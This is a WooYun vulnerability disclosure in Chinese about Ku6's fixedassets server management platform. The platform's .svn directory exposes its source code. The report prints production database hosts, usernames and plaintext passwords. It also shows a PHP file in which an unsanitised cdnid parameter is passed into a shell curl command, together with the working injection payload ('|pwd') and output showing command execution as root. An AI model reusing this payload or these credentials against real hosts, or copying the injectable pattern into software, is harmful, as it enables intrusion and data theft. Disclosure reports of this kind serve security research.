缺陷编号:WooYun-2014-088879
漏洞标题:酷6网服务器统一管理平台源码泄露(进而引发命令执行漏洞)
相关厂商:酷6网
漏洞作者:路人甲
提交时间:2014-12-27 02:00
公开时间:2015-01-01 02:02
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2014-12-27: 细节已通知厂商并且等待厂商处理中
2014-12-27: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-01-01: 厂商已经主动忽略漏洞,细节向公众公开
酷6网服务器统一管理平台源码泄露(进而引发命令执行漏洞)
可直接下载整站源码http://fixedassets.ku6.cn/.svn/entries
进行源码分析发现这是一台非常敏感的服务器,配置服务器用的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
function server_group_assign() //批量分配服务器<br> {<br> require './inc_check_permit.php';<br> if (!isPermitted("server_op"))<br> {<br> $this->window_alert("无此操作权限");<br> return false;<br> }<br> $fixed = __post('fixed');<br> if(empty($fixed)){<br> $this->window_alert('请选择你要分配的服务器!');<br> return false;<br> }<br> $server_array = array();<br> //var_dump($fixed);exit();<br> foreach($fixed as $k=>$v){<br> $server_id = $k;<br> $server_array[] = $k;<br> $business_id = $v['business_id'];<br> $this->validate($business_id, 'not_zero', null, '编号为【'.$k.'】的服务器:业务必须填写');<br> $sub_business_id = $v['sub_business_id'];<br> $this->validate($sub_business_id, 'not_zero', null, '编号为【'.$k.'】的服务器:子业务必须填写');<br> $depart = $v['depart'];<br> $this->validate($depart, 'not_zero', null, '编号为【'.$k.'】的服务器:所属部门必须填写');<br> $person = $v['person'];<br> $this->validate($person, 'not_zero', null, '编号为【'.$k.'】的服务器:所属部门责任人必须填写');<br> $supporter = $v['supporter'];<br> $this->validate($supporter, 'not_zero', null, '编号为【'.$k.'】的服务器:联系人必须填写');<br> $backup_supporter = $v['backup_supporter'];<br> $this->validate($backup_supporter, 'not_zero', null, '编号为【'.$k.'】的服务器:备份联系人必须填写');<br> } |
#3 某附件直接存放了生产服务器的密码
http://fixedassets.ku6.cn/config_check_list.php 各种敏感信息
1 2 |
$res = real_mysql_query($sql, '125.76.238.232', 'itil', 'Itil', 'storage_cluster', 3306);<br> $res = real_mysql_query($sql, '203.187.170.74', 'root', 'dogoicq', 'itil', 3305); |
# 代码执行漏洞在这里CdnDeleveMdfy.php
1 2 3 4 5 6 7 8 9 |
<?<br> #####生效<br> $cdnid=$_GET['cdnid'];<br> if ($_GET['reload'])<br> {<br> $OK1=`curl -is "http://59.151.119.26:8080/cmd/4?cdnid=$cdnid"`;<br> echo nl2br($OK1);<br> }<br> ?> |
传入 reload=1 & cdnid=99999"|pwd 就执行命令了
1 2 3 4 5 6 |
$uname -a<br> Linux server.oss.com 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64<br> $pwd<br> /data/WWW/itil/htdocs<br> $whoami<br> root |
更改配置
危害等级:无影响厂商忽略
忽略时间:2015-01-0102:02
漏洞Rank:15 (WooYun评价)
暂无
原文连接
的情况下转载,若非则不得使用我方内容。